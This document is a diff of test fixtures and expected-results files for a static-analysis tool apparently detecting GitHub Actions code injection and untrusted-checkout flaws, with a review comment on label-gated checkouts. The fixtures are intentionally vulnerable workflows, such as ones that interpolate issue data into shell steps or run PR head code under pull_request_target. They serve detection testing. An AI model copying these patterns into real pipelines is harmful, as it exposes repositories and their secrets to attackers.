github.event.client_payload.connector_name | subpaths #select -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. 
| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml new file mode 100644 index 00000000000..552ad866b5a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml @@ -0,0 +1,33 @@ +on: + workflow_dispatch: + +jobs: + fetch-issues: + runs-on: ubuntu-latest + steps: + - name: Fetch open issues + id: issues + uses: octokit/request-action@v2.x + with: + route: GET /repos/foo/bar/issues?state=open + env: + GITHUB_TOKEN: ${{ secrets.GITHUBACTIONS_TOKEN }} + + - name: Write issues to file + run: | + echo '${{ steps.issues.outputs.data }}' > issues.json + + - name: Setup Node.js + uses: actions/setup-node@v2 + with: + node-version: '14' + + - name: Print issue URLs + run: | + const fs = require('fs'); + const issues = JSON.parse(fs.readFileSync('issues.json', 'utf8')); + const filteredIssues = issues.filter(issue => issue.body.includes('Is your portal managed or self-hosted?\r\n\r\nManaged')); + for (const issue of filteredIssues) { + console.log(issue.html_url); + } + shell: bash diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 1ad0d498791..83faf4eb5e4 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -159,6 +159,7 @@ edges | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -484,6 +485,8 @@ nodes | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -639,6 +642,7 @@ subpaths | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index eb852fdd4d2..15d526ca7b4 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -159,6 +159,7 @@ edges | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -484,6 +485,8 @@ nodes | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] |
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml
new file mode 100644
index 00000000000..c4f90b97d05
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml
@@ -0,0 +1,22 @@
+on:
+ pull_request_target:
+ types: [ opened, synchronize ]
+
+permissions: {}
+jobs:
+ test:
+ permissions:
+ contents: write
+ pull-requests: write
+
+ runs-on: ubuntu-latest
+ env:
+ GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}"
+ steps:
+ - name: Checkout repo for OWNER TEST
+ uses: actions/checkout@v4
+ if: contains(github.event.pull_request.labels.*.name, 'safe to test')
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: |
+ ./cmd
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml
new file mode 100644
index 00000000000..942b17967d3
--- /dev/null
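Review bot: Neither new fixture (test19.yml here, test20.yml in the next file section) states what result the query should give for the `if: contains(github.event.pull_request.labels.*.name, 'safe to test')` gate on the checkout step. The two files differ only in `ref:` (`head.ref` versus `head.sha`), and with `types: [ opened, synchronize ]` a label applied once is still present on later pushes, so the gate does not tie the approval to a reviewed commit; whether the label counts as a control is exactly what these tests pin down. I would open each file with a comment such as `# label-gated checkout of PR head under pull_request_target; expected: <alert | no alert> in UntrustedCheckoutCritical`, filled in from the .expected file. The `- run: ./cmd` step carries no `if:` of its own, which is worth stating in the same comment if it is intentional.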
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml
@@ -0,0 +1,22 @@
+on:
+ pull_request_target:
+ types: [ opened, synchronize ]
+
+permissions: {}
+jobs:
+ test:
+ permissions:
+ contents: write
+ pull-requests: write
+
+ runs-on: ubuntu-latest
+ env:
+ GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}"
+ steps:
+ - name: Checkout repo for OWNER TEST
+ uses: actions/checkout@v4
+ if: contains(github.event.pull_request.labels.*.name, 'safe to test')
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - run: |
+ ./cmd
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
index 1160497a4a3..15d4813c40e 100644
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
@@ -1,15 +1,25 @@ on: - pull_request_target + pull_request_target: jobs: - build: + test1: runs-on: ubuntu-latest - env: - HEAD: ${{ github.event.pull_request.head.sha }} steps: - uses: actions/checkout@v2 with: ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + test2: + runs-on: ubuntu-latest + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }}
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml
index 5494d97797e..7e154502c13 100644
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml
@@ -1,34 +1,8 @@ -name: Auto Bump Versions - on: issue_comment: types: [created, edited] jobs: - add-same-version-label-to-pr: - runs-on: ubuntu-latest - if: github.event.issue.pull_request && contains(github.event.comment.body, '/add-same-version-label') - steps: - - uses: actions/checkout@v3 - - name: Add same version label - uses: actions/github-script@v6 - if: success() - with: - github-token: ${{secrets.GITHUB_TOKEN}} - script: | - github.rest.issues.addLabels({ - issue_number: context.issue.number, - owner: context.repo.owner, - repo: context.repo.repo, - labels: ['same version'] - }) - github.rest.issues.createComment({ - issue_number: context.issue.number, - owner: context.repo.owner, - repo: context.repo.repo, - body: '👋 Added [same version] label :)!' - }) - build: if: ${{ github.event.issue.pull_request }} && contains(github.event.comment.body, '/version') runs-on: ubuntu-latest @@ -75,26 +49,3 @@ jobs: run: | ./version.sh -u -p echo "BUMP_TYPE=patch" >> $GITHUB_ENV - - - name: Add labels - uses: actions/github-script@v6 - if: ${{ env.BUMP_TYPE }} - with: - script: | - github.rest.issues.addLabels({ - issue_number: context.issue.number, - owner: context.repo.owner, - repo: context.repo.repo, - labels: ['version/${{ env.BUMP_TYPE }}'] - }) - - - name: Push Changes - if: ${{ env.BUMP_TYPE }} - run: | - git config user.name 'github-actions[bot]' - git config user.email 'github-actions[bot]@users.noreply.github.com' - git pull - git add . - git commit -m "Update ${{ env.BUMP_TYPE }} version" --signoff - git push - diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index baf354179b3..237928fc892 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -265,6 +265,8 @@ edges | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:33:15:36:12 | Run Step | | .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | +| .github/workflows/test19.yml:16:7:21:4 | Uses Step | .github/workflows/test19.yml:21:7:22:14 | Run Step | +| .github/workflows/test20.yml:16:7:21:4 | Uses Step | .github/workflows/test20.yml:21:7:22:14 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -274,16 +276,14 @@ edges | .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | -| .github/workflows/untrusted_checkout4.yml:12:7:13:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:13:7:32:2 | Uses Step | -| .github/workflows/untrusted_checkout4.yml:37:7:55:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | -| .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | -| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | -| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | -| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | -| .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:91:7:100:9 | Run Step | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:11:7:29:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | 
.github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | | .github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | 
@@ -294,44 +294,44 @@ edges | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | #select -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | -| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | -| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. 
